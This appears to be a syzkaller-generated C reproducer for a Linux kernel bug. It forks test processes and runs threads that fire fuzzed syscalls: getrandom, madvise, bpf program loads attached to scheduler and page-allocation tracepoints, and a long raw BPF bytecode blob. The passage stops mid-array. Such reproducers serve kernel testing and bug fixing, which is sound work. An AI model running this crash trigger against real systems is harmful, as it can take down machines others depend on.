// https://syzkaller.appspot.com/bug?id=f10ee477162a6f234fa4fc7120fa57a4586533c8 // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifndef __NR_bpf #define __NR_bpf 321 #endif #ifndef __NR_getrandom #define __NR_getrandom 318 #endif static void sleep_ms(uint64_t ms) { usleep(ms * 1000); } static uint64_t current_time_ms(void) { struct timespec ts; if (clock_gettime(CLOCK_MONOTONIC, &ts)) exit(1); return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000; } static void thread_start(void* (*fn)(void*), void* arg) { pthread_t th; pthread_attr_t attr; pthread_attr_init(&attr); pthread_attr_setstacksize(&attr, 128 << 10); int i = 0; for (; i < 100; i++) { if (pthread_create(&th, &attr, fn, arg) == 0) { pthread_attr_destroy(&attr); return; } if (errno == EAGAIN) { usleep(50); continue; } break; } exit(1); } #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) typedef struct { int state; } event_t; static void event_init(event_t* ev) { ev->state = 0; } static void event_reset(event_t* ev) { ev->state = 0; } static void event_set(event_t* ev) { if (ev->state) exit(1); __atomic_store_n(&ev->state, 1, __ATOMIC_RELEASE); syscall(SYS_futex, &ev->state, FUTEX_WAKE | FUTEX_PRIVATE_FLAG, 1000000); } static void event_wait(event_t* ev) { while (!__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE)) syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, 0); } static int event_isset(event_t* ev) { return __atomic_load_n(&ev->state, __ATOMIC_ACQUIRE); } static int event_timedwait(event_t* ev, uint64_t timeout) { uint64_t start = current_time_ms(); uint64_t now = start; for (;;) { uint64_t remain = timeout - (now - start); struct timespec ts; ts.tv_sec = remain / 1000; ts.tv_nsec = (remain % 1000) * 1000 * 1000; syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, &ts); if (__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE)) return 1; now = current_time_ms(); if (now - start > timeout) return 0; } } static bool write_file(const char* file, const char* what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) return false; if (write(fd, buf, len) != len) { int err = errno; close(fd); errno = err; return false; } close(fd); return true; } static void kill_and_wait(int pid, int* status) { kill(-pid, SIGKILL); kill(pid, SIGKILL); for (int i = 0; i < 100; i++) { if (waitpid(-1, status, WNOHANG | __WALL) == pid) return; usleep(1000); } DIR* dir = opendir("/sys/fs/fuse/connections"); if (dir) { for (;;) { struct dirent* ent = readdir(dir); if (!ent) break; if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0) continue; char abort[300]; snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name); int fd = open(abort, O_WRONLY); if (fd == -1) { continue; } if (write(fd, abort, 1) < 0) { } close(fd); } closedir(dir); } else { } while (waitpid(-1, status, __WALL) != pid) { } } static void setup_test() { prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); setpgrp(); write_file("/proc/self/oom_score_adj", "1000"); } struct thread_t { int created, call; event_t ready, done; }; static struct thread_t threads[16]; static void execute_call(int call); static int running; static void* thr(void* arg) { struct thread_t* th = (struct thread_t*)arg; for (;;) { event_wait(&th->ready); event_reset(&th->ready); execute_call(th->call); __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED); event_set(&th->done); } return 0; } static void execute_one(void) { int i, call, thread; for (call = 0; call < 20; call++) { for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0])); thread++) { struct thread_t* th = &threads[thread]; if (!th->created) { th->created = 1; event_init(&th->ready); event_init(&th->done); event_set(&th->done); thread_start(thr, th); } if (!event_isset(&th->done)) continue; event_reset(&th->done); th->call = call; __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED); event_set(&th->ready); event_timedwait(&th->done, 50 + (call == 2 ? 500 : 0) + (call == 3 ? 500 : 0) + (call == 5 ? 500 : 0) + (call == 6 ? 500 : 0)); break; } } for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++) sleep_ms(1); } static void execute_one(void); #define WAIT_FLAGS __WALL static void loop(void) { int iter = 0; for (;; iter++) { int pid = fork(); if (pid < 0) exit(1); if (pid == 0) { setup_test(); execute_one(); exit(0); } int status = 0; uint64_t start = current_time_ms(); for (;;) { if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid) break; sleep_ms(1); if (current_time_ms() - start < 5000) continue; kill_and_wait(pid, &status); break; } } } uint64_t r[8] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff, 0x0, 0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff}; void execute_call(int call) { intptr_t res = 0; switch (call) { case 0: syscall(__NR_getrandom, /*buf=*/0x20000440ul, /*len=*/0x7591fcc76eda37b7ul, /*flags=*/0ul); break; case 1: syscall(__NR_madvise, /*addr=*/0x20000000ul, /*len=*/0x600003ul, /*advice=*/0x15ul); break; case 2: *(uint32_t*)0x20000200 = 0x11; *(uint32_t*)0x20000204 = 5; *(uint64_t*)0x20000208 = 0; *(uint64_t*)0x20000210 = 0x20000180; memcpy((void*)0x20000180, "syzkaller\000", 10); *(uint32_t*)0x20000218 = 0; *(uint32_t*)0x2000021c = 0; *(uint64_t*)0x20000220 = 0; *(uint32_t*)0x20000228 = 0; *(uint32_t*)0x2000022c = 0; memset((void*)0x20000230, 0, 16); *(uint32_t*)0x20000240 = 0; *(uint32_t*)0x20000244 = 2; *(uint32_t*)0x20000248 = -1; *(uint32_t*)0x2000024c = 8; *(uint64_t*)0x20000250 = 0; *(uint32_t*)0x20000258 = 0; *(uint32_t*)0x2000025c = 0x10; *(uint64_t*)0x20000260 = 0; *(uint32_t*)0x20000268 = 0; *(uint32_t*)0x2000026c = 0; *(uint32_t*)0x20000270 = 0; *(uint32_t*)0x20000274 = 0; *(uint64_t*)0x20000278 = 0; *(uint64_t*)0x20000280 = 0; *(uint32_t*)0x20000288 = 0x10; *(uint32_t*)0x2000028c = 0; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000200ul, /*size=*/0x90ul); if (res != -1) r[0] = res; break; case 3: *(uint64_t*)0x20000200 = 0x200001c0; memcpy((void*)0x200001c0, "sched_process_wait\000", 19); *(uint32_t*)0x20000208 = r[0]; syscall(__NR_bpf, /*cmd=*/0x11ul, /*arg=*/0x20000200ul, /*size=*/0x10ul); break; case 4: sprintf((char*)0x200001c0, "0x%016llx", (long long)0); syscall(__NR_write, /*fd=*/-1, /*buf=*/0x200001c0ul, /*len=*/0xfffffdeful); break; case 5: *(uint32_t*)0x20000200 = 0x11; *(uint32_t*)0x20000204 = 4; *(uint64_t*)0x20000208 = 0x200002c0; memcpy((void*)0x200002c0, "\x18\x01\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x04" "\x85\x00\x00\x00\x6d\x00\x00\x00\x95", 25); *(uint64_t*)0x20000210 = 0x20000100; memcpy((void*)0x20000100, "GPL\000", 4); *(uint32_t*)0x20000218 = 0; *(uint32_t*)0x2000021c = 0; *(uint64_t*)0x20000220 = 0; *(uint32_t*)0x20000228 = 0; *(uint32_t*)0x2000022c = 0; memset((void*)0x20000230, 0, 16); *(uint32_t*)0x20000240 = 0; *(uint32_t*)0x20000244 = 2; *(uint32_t*)0x20000248 = -1; *(uint32_t*)0x2000024c = 8; *(uint64_t*)0x20000250 = 0; *(uint32_t*)0x20000258 = 0; *(uint32_t*)0x2000025c = 0x10; *(uint64_t*)0x20000260 = 0; *(uint32_t*)0x20000268 = 0; *(uint32_t*)0x2000026c = 0; *(uint32_t*)0x20000270 = 0; *(uint32_t*)0x20000274 = 0; *(uint64_t*)0x20000278 = 0; *(uint64_t*)0x20000280 = 0; *(uint32_t*)0x20000288 = 0x10; *(uint32_t*)0x2000028c = 0; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000200ul, /*size=*/0x78ul); if (res != -1) r[1] = res; break; case 6: *(uint64_t*)0x20000200 = 0x20000140; memcpy((void*)0x20000140, "mm_page_alloc\000", 14); *(uint32_t*)0x20000208 = r[1]; syscall(__NR_bpf, /*cmd=*/0x11ul, /*arg=*/0x20000200ul, /*size=*/0x10ul); break; case 7: *(uint32_t*)0x20000280 = 6; *(uint32_t*)0x20000284 = 4; *(uint64_t*)0x20000288 = 0x20002940; memcpy( (void*)0x20002940, "\x18\x02\x00\x00\xe2\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\xc6\x85" "\x00\x00\x00\x36\x00\x00\x00\x95\x00\x00\x18\x00\x00\x00\x00\x92\x2a" "\xe8\x37\x13\xab\x96\x00\x01\x00\x00\x80\x1b\x10\xfb\x54\xa8\xcb\x72" "\xd2\x32\xad\x55\x8c\x46\xff\xf4\x20\x8d\x49\x90\xec\x11\xce\x94\x13" "\xac\x30\xe0\x0b\xd0\x08\x1f\x85\x04\xe1\x9a\x51\x83\xd7\x69\x67\x65" "\x20\xe9\x8a\x26\x33\x45\xe4\x4d\x5a\xd1\x2b\xca\x35\x51\x01\x00\xc4" "\xd8\x6a\xbe\xb1\x23\x03\xff\x1c\x9f\xe0\xd0\x02\x00\x00\xd6\x04\x00" "\x00\x00\x07\xd3\x67\x00\x00\x00\x8a\xff\x66\xd6\xb3\x18\x1f\xfc\x1d" "\x62\xa3\x95\x4c\x11\x98\xbb\xc4\xfa\x13\xae\xe4\x8c\xa9\xe8\x96\x9f" "\xae\xbf\x31\x83\xfe\x80\x3a\xb3\xf5\x02\x4b\x52\xdc\x26\x5b\x36\xfc" "\x9d\xae\x00\xa0\x94\x04\xf0\x1f\x95\x04\xd0\x97\x6d\x25\x2b\xd8\xd2" "\x45\x38\x55\x6e\x5e\x57\xbe\xe3\xb8\xcf\x46\x4e\xf3\xc6\xa7\xde\xf8" "\xba\xd3\xca\x6e\x3a\xbd\xb2\x16\x96\xe3\x40\xbb\x8e\x2a\x09\x3a\xdd" "\x57\x19\x6b\x40\xde\xf3\x85\x8e\xf5\x69\x14\x7f\xa4\x10\x83\x28\x39" "\x2d\x32\x2a\xb5\xdf\x10\xa2\xf6\x9a\x6b\xdf\x72\xee\x79\x44\xe8\x10" "\xd0\x22\x39\x17\xc3\xd0\x42\x41\x0f\x57\x46\x6f\x59\x54\x40\x47\xd6" "\xd8\xac\x44\x06\x00\x00\x00\x00\x00\xee\x16\xc7\x29\x30\x0d\x23\x01" "\x80\x00\x00\x00\x00\x00\x00\x2b\x5a\x8b\x05\xfc\xc1\x54\xad\x52\x90" "\xa8\xcd\xb9\x7c\x34\x3f\x45\x4f\xf6\x9d\xd6\xcb\xde\x49\xb2\x8a\x6c" "\xb5\xf4\xfc\x00\x01\x74\x5c\xff\x6e\x00\xe7\xff\xff\xff\x00\x00\xac" "\xf3\x20\x9a\x08\x43\x9f\x1f\xf0\x17\x79\xb6\xf6\xdf\x7e\x02\xaa\x6d" "\x77\x60\x52\x5b\x59\x5f\xe1\xf6\x97\xbc\x11\x4e\xd1\x77\x8e\x97\xa3" "\xf0\x39\x5f\x94\x69\x74\xcf\xb4\x58\xbe\x2a\x34\xcf\x92\x4d\xc3\x7b" "\x55\x92\xbf\x17\x95\x6f\x35\x47\x49\x7a\xba\x81\x43\x82\xff\x67\xb3" "\x45\xb6\x77\xa9\xd6\x52\x3d\x87\x00\x80\x00\x00\x04\x00\x00\x00\x00" "\x00\x3f\xe8\x61\x3c\xa2\x9f\xf9\x2b\xe0\xd8\xde\xff\xff\x7b\x68\x13" "\x6b\x00\x46\xd5\x35\xdd\x39\xc0\xf3\x54\x08\x86\x9e\x9b\x34\x2b\x95" "\x3f\x91\x44\x7e\x6b\x9e\xab\x30\x4f\x13\x43\x06\x32\x06\x00\xa4\x40" "\x95\x25\x4b\x45\xa6\xc1\x31\x2a\x13\x69\x6c\x72\x02\xdf\x5f\x76\x47" "\x13\x50\x4f\xac\xc5\x32\xc5\xa6\xd4\x4d\x99\xec\x75\x30\xed\x7b\x03" "\x11\x00\x00\x00\x00\x00\x00\xe5\x4e\x90\x72\xa2\x2d\x91\x1f\x4a\x2c" "\x2e\x2f\xa8\x06\xe6\x3c\x5c\xd9\x8a\x85\x69\xa6\xd6\xbc\xfb\x00\x00" "\x64\x88\x51\x17\xe2\xad\x91\x0e\xae\x67\xe0\xeb\xe3\x80\xd0\xf6\x48" "\x71\x3e\x68\x15\x35\x79\xe0\x2d\x71\xc5\x8d\x14\x7b\x00\x82\x1a\xb9" "\xa6\x47\x5b\x31\xe1\xeb\xf1\x36\x9a\x04\x00\x00\x00\xfb\xf3\x98\x3f" "\x28\x3f\x2f\x00\x00\x00\x00\x99\x27\x74\x81\x4d\x63\xc9\x33\x91\x2d" "\x00\x00\x06\x00\x00\x00\xa6\x6a\xcb\x0a\x38\x85\x69\x29\xe7\xd8\xb1" "\xb0\x6c\x9b\xd5\xd7\xe5\x49\x0f\x3b\x85\x96\xb6\x94\xea\x94\x83\xbd" "\x4b\xd2\x87\xc8\x3d\xd9\x98\xa7\x46\x94\xd1\x8b\xdd\x8a\xd0\x98\x3b" "\xc9\x07\x70\xbb\xd2\x6a\x82\xb9\xd9\x9d\x5f\xc0\x45\x63\xb5\x23\xc4" "\x7e\xf8\xc3\x34\x00\xe9\x0d\x02\x00\x00\x00\x00\x00\x00\x00\x0e\xdf" "\x11\x47\xa7\xaf\xe7\x72\xcd\x45\xaf\x8a\xef\xfe\x27\x53\x08\x8e\x02" "\xca\x6b\xb2\xfe\xec\x44\x6c\xe7\xdb\xce\x66\xf0\xa9\x3a\x03\x37\x13" "\x20\x98\x08\x65\xc7\xc6\x2e\xa4\xd8\xf8\xa8\x64\xdc\xe9\xfa\x85\xae" "\xb0\x45\x43\x49\x10\x02\x96\xee\x2d\xba\x39\xc3\xf6\xfd\x6c\xf9\x67" "\x14\xe1\x1f\xe0\x3b\x50\x62\x80\x9a\x74\x18\xb1\x65\xdd\x03\x36\xd2" "\x26\xba\xc1\xe1\x22\x3b\xe1\xc9\x7b\x15\x17\x5d\x0e\x66\x4b\xeb\x12" "\x60\x00\xe9\x65\x49\xe1\xa1\x22\x8c\x68\x6e\xdb\x47\x5b\x70\x5e\xaa" "\x95\x15\xc9\x6f\x4f\xc6\xb3\xc9\x25\xea\x40\x4e\x0f\x1d\xe6\x10\x26" "\xdc\x6c\x66\x18\x58\x0f\xd6\xce\x9e\xac\x60\x2c\x17\x56\xf6\xd1\x05" "\x67\x12\x41\x21\x31\xed\x99\x25\x98\x9e\x01\xea\xe4\x89\xec\x70\x52" "\xe0\xed\x72\xc3\x26\xc7\xa8\xaa\x63\x99\x9e\x22\x97\xc5\x4c\xe1\x82" "\x2d\x14\xb7\xc7\x69\x9a\x9d\x06\x00\xf1\x1f\x2e\x7f\x47\x4c\xff\xbc" "\x35\xbc\x86\x23\xcd\x5e\xb6\x8a\xf8\x22\x75\xa9\x40\xbe\x04\x00\x00" "\x00\x00\x00\x00\x00\xbc\xc3\xfb\xe7\xd9\x0d\xe9\x6d\x6a\x8e\x9f\x32" "\xf1\x8d\x1f\x60\x6b\x38\x1e\x49\x03\xb5\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x4a\x23\x57\xba\x5f\x60\x00\xde\x1c\xfa\x88\xb7\x16" "\x5d\xcf\x4f\x2a\xae\xe8\x6d\x48\x02\x00\x00\x00\x00\x00\x00\x00\x8f" "\xdb\x68\x6d\x5d\xa2\xa4\x2e\x4b\x50\x24\xb6\x53\x58\x11\xf3\x62\x20" "\x1d\x4f\x82\x01\x2e\x6a\xf7\x04\x97\x3d\x04\xea\x92\x3c\x19\xe6\xcb" "\x72\x3c\x19\x23\xb3\xee\xa2\xd7\x3e\x17\x6d\xff\x38\x3c\x9f\xbb\xac" "\x53\xdf\xdc\xb1\xa6\x8c\x98\xe9\x6f\xe3\x9e\xec\x23\x96\x3f\xaf\x3e" "\xbe\xd3\x40\x91\x44\xc7\xc5\x3d\x63\x18\xce\xd6\x78\x01\x00\x00\x00" "\x9b\x01\xe9\xf2\x77\x2e\x5f\x29\x99\xd3\x43\x5d\xa0\x25\x56\xe3\x6c" "\x32\x15\xd2\xbd\x4e\x96\xc9\x3b\xff\x3a\xd0\x4a\x82\xff\x3c\xfa\xdc" "\xf6\x5e\xb9\x2a\xdc\x6c\x68\xd6\x6b\x11\xcb\x2d\x75\x56\x41\x4a\x86" "\xdf\xa9\x4b\xb7\xaa\x52\xc7\xfe\xbb\x1e\x9b\x2e\xfc\xbb\xc5\xbc\xcf" "\x9d\x39\xbe\xd8\x02\xf4\xf0\x56\x97\x6a\x9a\x36\x2e\xe9\xcc\x62\x4e" "\xc4\x54\xb9\x02\x00\xfd\x96\x03\xf9\x69\x08\xbd\xdc\x14\x50\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\xd9\x17\xc6\x2b\x27" "\x67\x99\x13\x07\x57\x31\xe8\xfd\xdb\x07\xc1\x0c\x82\x00\x2d\x60\x18" "\x15\x88\xae\x63\xa4\x40\x45\x42\x87\xde\x9e\x34\x0f\x61\x12\x67\xf3" "\x7b\xdd\x0f\x2d\x21\xcb\x06\xfc\xaf\x45\xa0\xa2\x97\xe3\x96\xf4\x28" "\xd4\x33\x71\x42\x4b\x30\x7e\xef\x82\xc5\xd6\xd1\x9f\x3e\xf0\xd3\xb8" "\xf7\xfa\x51\x95\x7e\x30\x99\xca\xab\x31\x13\x3b\x34\xa1\xd3\xee\xbc" "\x0f\x0c\x90\x56\xdf\x2e\x96\x67\xba\x0b\x55\x69\x5c\x78\x94\x01\x00" "\x79\xb0\x7e\x7a\xef\x77\x85\xe2\x48\x64\x72\xb5\xcb\xa1\xf3\x34\x6c" "\x1e\x8e\x23\xde\xb8\xc8\x2b\xb6\xeb\x2c\x72\xc4\x84\x24\x1d\xc3\xb6" "\x6d\xa7\x82\x60\xf8\x00\xff\xfd\x39\x36\x8b\x95\x2f\x6f\x4a\x10\x29" "\x5c\x50\xc8\x87\xa3\x1d\x8b\x54\x3c\x5d\x10\xf2\xdb\xd4\xd0\xb8\x4e" "\xaa\xd4\x3f\xeb\x6e\x16\x9a\x9f\x2f\xcf\xf7\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\xe0\x11\xbc\x63\x66\xf5\x6f\xa7\x87\xf2\x12\xc1\xf8\xc0" "\xf4\x7f\x50\xb1\xe9\xb5\xd8\x41\xea\x55\xfe\x56\x9b\xb7\xbf\x1e\x78" "\x19\x1c\x8a\x02\xad\x43\x67\x25\x77\x17\x38\xa2\xa9\x88\x91\x97\x1e" "\x3b\x93\x23\x52\x89\x6e\x1e\xa1\x0f\x62\xe8\xef\x7a\x87\xe1\x61\x51" "\xb3\x9d\x6c\x27\x57\x57\x14\x54\x0d\x8c\x29\x3a\x3f\xa4\xb5\xa8\x25" "\x36\x04\x23\xc1\xcb\xc8\xb5\xd1\x91\x67\x15\x28\x23\xed\x85\x31\x40" "\xed\xda\x00\x2c\x16\xc8\x42\xb1\x68\xbb\x55\xf6\xbb\x71\x3d\xeb\x57" "\xd0\xba\xd9\x7a\xd5\x22\xc0\x74\x50\xaa\x78\xd6\xd4\xe5\xfc\x5b\xe2" "\xc4\x02\xbd\x24\x61\x28\xf4\x1b\xcb\x02\x00\x00\x00\x89\x2b\x13\x5a" "\x92\xe8\xc8\x44\x93\x8a\xa9\x8b\xa4\x83\x9a\x14\x08\xa6\x96\x45\x4d" "\x40\xe5\xee\xd4\xd4\xdc\xe4\x81\xca\x86\xbf\xac\x54\xc3\x30\x33\x1b" "\x7f\x2c\xde\x17\xcb\xae\xb0\x37\x76\x96\xfa\xf5\x46\xec\xbe\x74\x2d" "\x73\xd4\x7d\x72\x6a\x50\xf6\xe7\x52\xf3\x32\x52\x55\xbd\x7e\x8b\x59" "\x23\xaa\x3c\xfb\x6f\x7e\x06\x49\x4f\x21\xca\x45\x01\x39\xc5\x58\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x75\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55" "\x60\xbd\x9e\xb8\x1e\x83\x9e\x49\x92\xe6\x4b\x07\x4a\x66\xcc\xcc\xcf" "\x00\x33\x4f\xa9\x4d\xa8\x47\x7b\xe7\xd9\x9b\x55\x8e\xc6\xa5\xb1\x59" "\x6a\xc1\xe7\x61\x7c\x6b\x32\xee\xd0\xcc\x70\x28\x6c\xaf\x2c\x51\x89" "\xa1\x03\xf4\xb0\xb0\x4a\xff\x17\x1c\x4d\x38\x8c\xcf\x67\xfe\xa3\x7e" "\x78\x2f\x02\x5c\x04\xfe\x8b\xa9\x75\xcf\x61\x6c\x71\x34\xd6\x93\x4e" "\x25\x94\xc8\x53\xcd\xe3\x30\xa1\x93\xa9\x67\xd9\x07\xa8\xc8\x8f\xcb" "\x03\x3e\x68\x0f\x55\x9a\x72\x15\x0c\xb9\x00\xba\xfc\xd5\x36\xf4\x87" "\x97\x91\x5a\x2f\xe9\x92\x2c\xe2\x73\x00\x00\x9e\x1b\x36\xaa\x47\x30" "\x11\x7d\x9b\x00\x00\x00\x00\x00\x3c\x63\x00\x00\x00\x00\x00\x00\x8f" "\xbb\xd1\x1b\x01\x5c\x41\x5c\xa0\x41\x92\xfb\xfb\x1a\x8b\x0e\x34\x60" "\xaf\x35\x77\x1d\xba\xc1\x00\x62\x83\x5c\x9b\xab\x3a\xd0\x9f\x7a\x02" "\x2c\x52\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7b\xe5\x2c\x0d\x05\xb4\xcd\x12" "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6e\xc4" "\x73\xc5\x43\x99\xb7\xb8\xaa\x1e\xe4\x61\x32\xfc\x45\xda\x82\x92\x63" "\x11\x78\xce\xcf\x19\x55\x01\x08\xb8\xb8\x42\x3d\xe4\x29\x57\xff\xe9" "\xbb\x6d\x75\x2e\x68\xd2\xbc\x2c\xe7\x77\xa1\x7b\xf4\xdf\xdf\xee\x5d" "\xe0\xf3\xe4\xda\xdf\x51\xab\x03\xd2\x16\x5c\xcc\x95\x62\x82\x7b\x76" "\x2f\xa6\x11\xba\x5f\x32\x86\x1c\x19\xdf\xfe\x1d\xc9\xfd\x5c\x41\xcd" "\x46\xcf\x13\x42\xd6\xb0\xc2\xdd\xad\x90\xac\x33\xf7\x68\xf9\xec\xc7" "\x03\x27\xc5\x99\x18\xfa\x5a\x24\x9b\xef\xe9\x82\x62\xf5\x3c\x81\x82" "\xd9\x5f\x6d\xa3\x69\x8a\x6a\x88\xc2\xc3\x1d\x80\x1a\x8f\x1f\x5e\x0c" "\xe0\x51\x38\xd5\x42\x2d\xa0\xa6\xa6\x2b\x9d\xfe\x1f\x39\x77\x5d\x1d" "\x0c\x91\x86\x09\x64\x15\xf5\x44\xaa\xf7\x6b\x0a\x1c\x87\x7a\x6c\x82" "\x6a\x5a\xdc\xfb\x22\xc4\xa0\xe5\xa4\x62\x71\xca\xa3\xea\xf4\xf3\x89" "\xdd\x5f\x3c\x20\xdb\xdd\xc0\x37\x7a\x42\x66\xd7\xb9\xfd\x61\xb9\x28" "\x7e\x9b\x4b\xe0\xa4\x13\xee\x31\xbe\x0d\xde\xca\xb0\xef\x5f\x25\xcb" "\xa1\xfb\x36\x54\xdd\xf2\x91\xec\xb7\x76\x8a\xc1\xe1\x77\x04\x2c\xb4" "\xc4\x52\xfa\x6b\x39\x66\x95\x00\x00\x00\x00\x00\x00\x00\x00\xc1\x87" "\xda\x23\xd6\x85\x55\x00\xfe\x85\x10\xb5\x1e\x13\xa8\x90\xe3\x94\xb8" "\x4a\x6e\xa2\xcc\x8d\x42\xb9\x7c\x69\x7c\x29\x12\x22\x98\xd5\x5e\x2e" "\x1c\xca\x8e\x07\xab\xda\x26\x06\xa3\xf3\x81\xc6\x4b\x9f\xec\x00\x00" "\x00\x0a\x79\x65\xe4\x85\x4e\x25\x21\x32\x86\x0c\x9a\xf1\xbd\x5f\xe2" "\x63\xc0\x31\x3d\xea\x5d\x6e\x0c\x11\xa4\x66\xd6\x89\x2e\xd6\x5f\x34" "\x66\x7d\xd7\x9b\x07\xb5\xcb\xdd\x8a\xa7\xdd\x56\x1a\x26\xb5\x56\x2d" "\x48\x61\xa7\xe1\xb0\xf4\x89\x30\xe0\xb6\x96\xea\x3b\xee\x7e\xb7\x27" "\x94\xe1\x63\xd7\xae\xac\x9a\x0f\xa5\x40\x3a\xc9\xcb\x42\x1e\xae\x28" "\x3b\x05\x50\xf1\xd0\xd3\x39\xcd\x7b\x96\xe7\x1d\x3a\xb4\x8a\xd9\xd7" "\x97\x5e\x0c\x9b\x11\x7f\x71\xd3\xab\x80\xa0\xc9\xb0\x28\x4e\xcc\x46" "\x9f\xa6\x18\x1c\x9c\x71\xfc\xe0\x7a\x6f\xfb\x23\x29\x6a\x10\x77\x63" "\x13\x8e\x8d\x98\x76\x29\x1a\xf2\x07\x68\x90\xc4\x79\x25\xac\x77\x3d" "\x95\xd2\xca\x42\xac\xb3\xe5\xf3\xa1\x55\x06\x65\xb8\x98\x46\x2c\x13" "\x9f\xfd\x01\x06\xbc\x8a\x61\xb6\x11\x7d\x25\x2e\xfc\xab\x71\x06\xb4" "\xc3\xa3\xc1\x3a\x70\xff\x45\x2e\x9d\x20\x96\x14\x2c\x51\x7b\x0e\x91" "\xb5\xcf\x88\x33\x2f\xac\xa5\xb3\xee\x96\x36\x30\x65\xc3\xce\x32\xd3" "\xd3\x9e\xc3\x6e\x20\xd5\x97\xe0\x56\x64\xf2\x52\x6b\xd9\x18\x09\x06" "\x49\xda\x11\xf7\x29\x97\x89\xd0\x0f\x50\x24\xdf\x1e\x99\xd3\xef\xec" "\xb9\xb4\x57\x64\x2f\xe8\x10\x37\x0b\xa4\xfb\xe0\x0f\xa6\x0a\x28\xaf" "\x96\x6a\x27\xa1\x65\x9e\x44\x8b\xbe\x43\xa1\xdc\xd2\xea\x76\x00\x18" "\xb5\x7a\x36\xac\x41\xef\x20\x51\xa7\xb7\x03\xd5\x5c\x06\x02\x54\x06" "\x63\x01\x6e\x20\xd5\x03\x85\x76\x6d\xf4\xda\xc4\x78\x02\xa5\x5b\xd3" "\x8d\xd7\x67\xee\x99\x60\xc6\xda\xa7\x04\xfc\x5d\x01\xa1\x45\x91\x34" "\xd1\xb9\xed\xfd\xe3\xbe\x9e\x25\xa1\x10\x22\x8c\x64\x25\x35\x88\xff" "\x42\x06\x44\xdb\xc0\x85\x4e\x69\xa7\xbd\xda\x72\xf9\x3c\xea\xcc\xf9" "\x2c\xfe\x7d\xd6\x29\x6c\x95\x0d\xb1\x12\x66\xf7\x0c\x2a\x1f\x0f\x6d" "\xd8\xa5\xef\x9b\x73\xcf\x6a\x12\xa1\xba\x16\xfd\xc7\xe3\x5b\x80\x5f" "\x4f\xd2\xfc\xff\x0a\x62\x37\x22\x14\x9c\x14\x65\xe4\xde\x2d\x53\xf0" "\xf1\x0b\x14\xc2\x18\x65\x02\x7a\xbc\x71\xa1\x2c\xb1\xe9\xf8\x02\x9c" "\x7a\x20\x00\x00\x00\xee\xb0\xd5\x3a\x83\xe5\x18\xc8\xd2\x05\x2c\x08" "\xb5\x15\xd9\xd0\xbd\xe2\x4a\xc4\xe7\x98\x04\x0c\x7d\xb0\xbb\x03\xc0" "\x19\x50\x7d\x63\x77\xf3\xd5\xdd\x94\xa2\x7a\xbc\x6d\x6b\x12\x0d\x61" "\xf7\x72\x40\x7e\x0d\x2c\xb5\x0d\x29\x16\x8b\x68\xae\xf9\xf1\x76\xb4" "\xc3\xaa\x8b\x21\x27\x9d\x4e\xa9\xc1\xf6\x69\xaa\x8c\x2c\x17\xd5\xb3" "\xa8\xd1\xdd\xa5\x8d\x26\xf1\x01\x9a\xf0\x4b\x77\x74\xc8\x5d\x5b\xce" "\x8b\xe0\x10\xf2\x7c\x52\x11\x93\x80\x31\xc3\x40\x46\x80\xb0\x12\x79" "\xc7\x78\xbd\x1f\xe1\xb4\x8c\x4b\x5b\x8e\x0f\xe7\x56\xe5\x4a\x8d\x76" "\xb7\xce\xc5\xe3\x40\x7d\x93\xb4\xea\xdc\x44\x64\x40\x60\x7d\xe8\x44" "\xac\xf5\x52\x4a\x46\x57\xe3\x3a\xf2\x11\x55\x47\xb7\x35\xb5\x7b\x50" "\x92\xd0\xbc\x8f\xa6\xac\xb8\x32\x50\x9a\xbe\x08\x82\xd5\x70\xce\x40" "\x0a\xae\xbd\x7b\xaf\xf8\x85\x26\x60\x8d\x69\x91\xaa\xc9\x57\x51\x67" "\x11\x74\x12\x94\x57\xe4\xa0\x3a\xca\x69\xd8\x2b\x64\xb8\x9e\x6a\xd6" "\xed\x1e\x27\x5e\xc5\x00\x2e\x48\x17\x0e\x4c\x7b\x4f\x39\x71\x48\x10" "\x98\xde\xdb\x88\xfb\xa9\x07\x70\xe4\x4b\xf4\x04\xd5\xa9\x7f\xef\xe2" 